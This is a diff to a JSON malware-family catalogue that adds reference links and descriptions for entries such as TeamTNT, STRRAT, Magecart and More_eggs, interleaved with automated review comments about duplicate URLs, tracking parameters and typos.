+ "https://blog.aquasec.com/teamtnt-campaign-against-docker-kubernetes-environment",
+ "https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt",
+ "https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera",
+ "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf",
+ "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/",
+ "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/",
+ "https://www.uptycs.com/blog/team-tnt-deploys-malicious-docker-image-on-docker-hub-with-pentesting-tools"
 ],
 "synonyms": [],
 "type": []
@@ -3967,7 +4765,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tntbotinger",
- "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html"
+ "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html",
+ "https://www.lacework.com/teamtnt-builds-botnet-from-chinese-cloud-servers/"
 ],
 "synonyms": [],
 "type": []
@@ -4015,6 +4814,7 @@
 "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
 "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
+ "https://twitter.com/ESETresearch/status/1382054011264700416",
 "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape"
 ],
 "synonyms": [],
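Review bot: `https://malpedia.caad.fkie.fraunhofer.de/details/elf.teamtnt` ends up twice in the TeamTNT refs of the `@@ -3931,16 +4705,40 @@` hunk — it is the unchanged first entry and is added again near the end of the list — so the second copy should be dropped. The same hunk replaces `https://www.cadosecurity.com/2020/08/17/teamtnt-the-first-crypto-mining-worm-to-steal-aws-credentials/` with the `/post/team-tnt-…` slug and then re-adds the old URL, leaving both forms of one article; keep a single one. If this list is produced by a generator from the upstream feed, the duplicate-suppression belongs there rather than in a hand edit.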
@@ -4041,12 +4841,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://blog.aquasec.com/fileless-malware-container-security",
 "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
 "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/",
 "http://get.cyberx-labs.com/radiation-report",
+ "https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/",
 "https://www.lacework.com/meet-muhstik-iot-botnet-infecting-cloud-servers/",
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/"
+ "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/",
+ "https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf",
+ "https://www.cadosecurity.com/teamtnt-script-employed-to-grab-aws-credentials/"
 ],
 "synonyms": [
 "Amnesia",
@@ -4087,7 +4892,7 @@
 "value": "Umbreon"
 },
 {
- "description": "According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in linux email servers. This attack leverages a week-old vulnerability to gain remote command execution on the target machine, search the Internet for other machines to infect, and initiates a crypto miner.",
+ "description": "According to Cybereason, these scripts have been used in an ongoing campaign exploiting a widespread vulnerability in the Exim MTA: CVE-2019-10149. This attack leverages a week-old vulnerability to gain remote command execution on the target machine, search the Internet for other machines to infect, and initiates a crypto miner.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_001",
@@ -4100,17 +4905,32 @@
 "value": "Unidentified Linux 001"
 },
 {
- "description": "Golang-based RAT that offers execution of shell commands and download+run capability. ",
+ "description": "This is an implant used by APT31 on home routers to utilize them as ORBs.",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_002",
- "https://labs.bitdefender.com/2020/10/theres-a-new-a-golang-written-rat-in-town/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.unidentified_003",
+ "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003",
+ "https://twitter.com/billyleonard/status/1417910729005490177",
+ "https://twitter.com/bkMSFT/status/1417823714922610689"
 ],
 "synonyms": [],
 "type": []
 },
- "uuid": "7c516b66-f4a4-406a-bf35-d898ac8bffec",
- "value": "Unidentified Linux 002"
+ "uuid": "c2866996-d622-4ee2-b548-a6598836e5ae",
+ "value": "Unidentified ELF 003"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vermilion_strike",
+ "https://www.intezer.com/blog/malware-analysis/vermilionstrike-reimplementation-cobaltstrike/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a4ded098-be7b-4852-adfd-8971ace583f1",
+ "value": "Vermilion Strike (ELF)"
 },
 {
 "description": "",
@@ -4124,6 +4944,7 @@
 "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/",
 "https://blog.talosintelligence.com/2019/05/one-year-later-vpnfilter-catastrophe.html",
 "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected",
 "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
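Review bot: The new description "This is an implant used by APT31 on home routers to utilize them as ORBs." leaves the abbreviation unexplained; expanding it once, e.g. `"…to utilize them as operational relay boxes (ORBs)."`, keeps the entry readable for consumers who never open the cited tweets. The uuid `7c516b66-f4a4-406a-bf35-d898ac8bffec` removed here reappears on the new NiuB entry earlier in this diff, which looks like the intended rename of "Unidentified Linux 002" with its identifier preserved, while "Unidentified ELF 003" receives a fresh uuid — worth a line in the commit message so the uuid move is not mistaken for a collision later.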
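Review bot: In the `@@ -4124,6 +4944,7 @@` VPNFilter hunk the added `https://www.lacework.com/blog/mirai-goes-stealth-tls-iot-malware/` is, going by its title, a Mirai write-up, and the same URL is also added to the Mirai entry earlier in this diff. It may well mention VPNFilter, but it would be worth confirming that before attaching it here, since misfiled refs are hard to spot once the list grows.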
@@ -4176,17 +4997,22 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess",
- "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-116a",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
 "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf",
 "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
 "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
 "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
+ "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf",
 "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://community.riskiq.com/article/541a465f/description",
 "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
 "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html",
 "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html",
+ "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf",
 "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
 "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html"
 ],
 "synonyms": [],
@@ -4253,7 +5079,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xanthe",
- "https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html"
+ "https://blog.talosintelligence.com/2020/12/xanthe-docker-aware-miner.html",
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775"
 ],
 "synonyms": [],
 "type": []
@@ -4292,6 +5119,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos",
+ "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-a-string-array-in-xor-ddos/",
 "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf",
 "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf",
 "https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/",
@@ -4300,9 +5128,10 @@
 "http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html",
 "https://en.wikipedia.org/wiki/Xor_DDoS",
 "https://www.lacework.com/groundhog-botnet-rapidly-infecting-cloud/",
- "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/",
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
 "https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html",
 "https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/",
+ "https://www.intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/"
 ],
 "synonyms": [
@@ -4313,6 +5142,19 @@
 "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4",
 "value": "XOR DDoS"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zhtrap",
+ "https://blog.netlab.360.com/new_threat_zhtrap_botnet_en/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d070ff73-ad14-4f6b-951f-1645009bdf80",
+ "value": "ZHtrap"
+ },
 {
 "description": "",
 "meta": {
@@ -4386,6 +5228,21 @@
 "uuid": "8a1b524b-8fc9-4b1d-805d-c0407aff00d7",
 "value": "lightSpy"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.phenakite",
+ "https://malware4all.blogspot.com/2021/05/grab-your-own-copy-phenakite-ios.html"
+ ],
+ "synonyms": [
+ "Dakkatoni"
+ ],
+ "type": []
+ },
+ "uuid": "7ba7488c-b153-4949-8391-bcf6c4b057bd",
+ "value": "Phenakite"
+ },
 {
 "description": "",
 "meta": {
@@ -4403,6 +5260,19 @@
 "uuid": "7982cc15-f884-40ca-8a82-a452b9c340c7",
 "value": "PoisonCarp"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.postlo",
+ "https://twitter.com/opa334dev/status/1374754519268098051"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "25bff9ad-20dc-4746-a174-e54fcdd8f0c1",
+ "value": "Postlo"
+ },
 {
 "description": "The iOS malware that is installed over USB by osx.wirelurker",
 "meta": {
@@ -4437,6 +5307,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind",
 "https://dissectingmalware.blogspot.com/2018/08/export-jratadwind-config-with-x32dbg.html",
 "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://blogs.seqrite.com/evolution-of-jrat-java-malware/",
 "https://research.checkpoint.com/malware-against-the-c-monoculture/",
 "http://malware-traffic-analysis.net/2017/07/04/index.html",
@@ -4519,6 +5390,19 @@
 "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84",
 "value": "CrossRAT"
 },
+ {
+ "description": "EpicSplit RAT is a multiplatform Java RAT that is capable of running shell commands, downloading, uploading, and executing files, manipulating the file system, establishing persistence, taking screenshots, and manipulating keyboard and mouse events. EpicSplit is typically obfuscated with the commercial Allatori Obfuscator software. One unique feature of the malware is that TCP messages sent by EpicSplit RAT to its C2 are terminated with the string \"_packet_\" as a packet delimiter.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.epicsplit",
+ "https://www.zscaler.com/blogs/security-research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "90b304a2-452a-4c74-ae8d-80d9ace881a4",
+ "value": "EpicSplit RAT"
+ },
 {
 "description": "",
 "meta": {
@@ -4687,11 +5571,15 @@
 "value": "Ratty"
 },
 {
- "description": "",
+ "description": "According to G DATA, STRRAT is a Java-based RAT, which makes extensive use of plugins to provide full remote access to an attacker, as well as credential stealing, key logging and additional plugins. The RAT has a focus on stealing credentials of browsers and email clients, and passwords via keylogging. It supports the following browsers and email clients: Firefox, Internet Explorer, Chrome, Foxmail, Outlook, Thunderbird. \r\n\r\nOlder version of the malware came with a rudimentary ransomware module that appends \".crimson\" to affected files. The affected files are not encrypted, but simply reamed. If the extension is removed, the files can be opened as usual.\r\n\r\nAs of at least version 1.5, STRRAT has an implemented encryption routine.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/jar.strrat",
- "https://www.gdatasoftware.com/blog/strrat-crimson"
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://www.jaiminton.com/reverse-engineering/strrat",
+ "https://twitter.com/MsftSecIntel/status/1395138347601854465",
+ "https://www.gdatasoftware.com/blog/strrat-crimson",
+ "https://isc.sans.edu/diary/rss/27798"
 ],
 "synonyms": [],
 "type": []
@@ -4738,6 +5626,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
 "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
 "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor"
 ],
 "synonyms": [],
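Review bot: The new STRRAT description in the `@@ -4687,11 +5571,15 @@` hunk has a typo that changes its meaning — "The affected files are not encrypted, but simply reamed." should read `"…but simply renamed."`, and "Older version of the malware" should be `"Older versions of the malware"`. The added `https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries` ref points at a repository root rather than the STRRAT-specific query, so it will be hard to locate the relevant file later; a path into the repository, or the commit that added the query, would make the citation actionable.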
@@ -4858,6 +5747,21 @@
 "uuid": "b7deec7e-24f7-4f78-9d58-9b3c1e182ab3",
 "value": "EVILNUM (Javascript)"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.gootloader",
+ "https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/",
+ "https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/",
+ "https://community.riskiq.com/article/f5d5ed38"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5b2569e5-aeb2-4708-889f-c6d598bd5e14",
+ "value": "GootLoader"
+ },
 {
 "description": "grelos is a skimmer used for magecart-style attacks.",
 "meta": {
@@ -4874,19 +5778,22 @@
 "value": "grelos"
 },
 {
- "description": "",
+ "description": "GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon",
 "https://twitter.com/ItsReallyNick/status/1059898708286939136",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
 "https://www.secureworks.com/research/threat-profiles/gold-niagara",
- "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/"
+ ],
+ "synonyms": [
+ "Harpy"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "85c25380-69d7-4d7e-b279-6b6791fd40bd",
@@ -4905,6 +5812,32 @@
 "uuid": "36b0f1a0-29a4-4ec5-bca2-18a241881d49",
 "value": "inter"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.jeniva",
+ "https://imp0rtp3.wordpress.com/2021/08/12/tetris/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b0631a44-3264-429d-b8bc-3a27e27be305",
+ "value": "Jeniva"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.jetriz",
+ "https://imp0rtp3.wordpress.com/2021/08/12/tetris/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "9e6a0a54-8b55-4e78-a3aa-15d1946882e1",
+ "value": "Jetriz"
+ },
 {
 "description": "",
 "meta": {
@@ -4955,24 +5888,32 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart",
+ "https://community.riskiq.com/article/743ea75b/description",
 "https://sansec.io/research/magento-2-persistent-parasite",
 "https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf",
 "https://sansec.io/research/north-korea-magecart",
 "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.riskiq.com/blog/labs/magecart-nutribullet/",
 "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
 "https://www.riskiq.com/blog/labs/magecart-medialand/",
+ "https://twitter.com/AffableKraut/status/1385030485676544001",
 "https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/",
- "https://www.riskiq.com/blog/labs/magecart-nutribullet/",
+ "https://scotthelme.co.uk/introducing-script-watch-detect-magecart-style-attacks-fast/?utm_source=dlvr.it&utm_medium=twitter",
+ "https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html",
 "https://community.riskiq.com/article/fda1f967",
 "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/",
+ "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/",
- "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/",
+ "https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/",
+ "https://twitter.com/AffableKraut/status/1415425132080816133?s=20",
+ "https://blog.malwarebytes.com/cybercrime/2021/06/lil-skimmer-the-magecart-impersonator/",
 "https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/",
 "https://www.goggleheadedhacker.com/blog/post/14",
 "https://www.riskiq.com/blog/labs/magecart-group-12-olympics/",
 "https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/",
+ "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/",
 "https://community.riskiq.com/article/5bea32aa",
 "https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/",
 "https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/",
@@ -4991,9 +5932,10 @@
 "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/",
 "https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/",
+ "https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/",
 "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html",
 "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/",
+ "https://twitter.com/MBThreatIntel/status/1416101496022724609",
 "https://maxkersten.nl/2020/02/24/closing-in-on-magecart-12/",
 "https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html",
 "https://www.reflectiz.com/the-gocgle-web-skimming-campaign/"
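Review bot: Two of the refs added to the js.magecart entry carry tracking query strings that are not part of the resource identity: `"https://twitter.com/AffableKraut/status/1415425132080816133?s=20"` and the `?utm_source=dlvr.it&utm_medium=twitter` suffix on the scotthelme.co.uk ref. Such parameters make one article appear under several distinct strings and defeat any duplicate check on the refs list, so I would store them stripped, e.g. `"https://twitter.com/AffableKraut/status/1415425132080816133"`. The same applies to the ConfiantIntel tweet added to osx.bundlore in the hunk starting at -5337. Older refs in the file already carry utm parameters (see the CrowdStrike ref kept in the js.griffon hunk), so a one-off normalisation pass may be preferable to fixing these piecemeal.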
@@ -5004,32 +5946,46 @@
 "uuid": "f53e404b-0dcd-4116-91dd-cad94fc41936",
 "value": "magecart"
 },
+ {
+ "description": "MiniJS is a very simple JavaScript-based first-stage backdoor. \r\nThe backdoor is probably distributed via spearphishing email. \r\nDue to infrastructure overlap, the malware can be attributed to the actor Turla. Comparable JavaScript-based backdoor families of the actor are KopiLuwak and IcedCoffee.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.minijs",
+ "https://www.virustotal.com/gui/file/0ce9aadf6a3ffd85d6189590ece148b2f9d69e0ce1c2b8eb61361eb8d0f98571/details"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5fd2f4f0-0591-45bb-a843-c194d5e294cd",
+ "value": "MiniJS"
+ },
 {
 "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs",
+ "https://twitter.com/Arkbird_SOLG/status/1301536930069278727",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/",
+ "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf",
+ "https://asert.arbornetworks.com/double-the-infection-double-the-fun/",
+ "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw",
+ "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/",
+ "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers",
+ "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
+ "https://blog.morphisec.com/cobalt-gang-2.0",
+ "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire",
+ "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/",
+ "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html",
 "https://attack.mitre.org/software/S0284/",
 "https://github.com/eset/malware-ioc/tree/master/evilnum",
- "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/",
 "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/",
- "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/",
- "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
- "http://www.secureworks.com/research/threat-profiles/gold-kingswood",
 "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/",
- "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers",
- "https://twitter.com/Arkbird_SOLG/status/1301536930069278727",
- "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish",
- "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf",
- "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html",
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
- "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
- "https://asert.arbornetworks.com/double-the-infection-double-the-fun/",
- "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/",
- "https://blog.morphisec.com/cobalt-gang-2.0"
+ "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/"
 ],
 "synonyms": [
 "SKID",
@@ -5076,11 +6032,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
 "https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/",
 "https://www.intrinsec.com/deobfuscating-hunting-ostap/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/",
 "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
 "https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py"
 ],
 "synonyms": [],
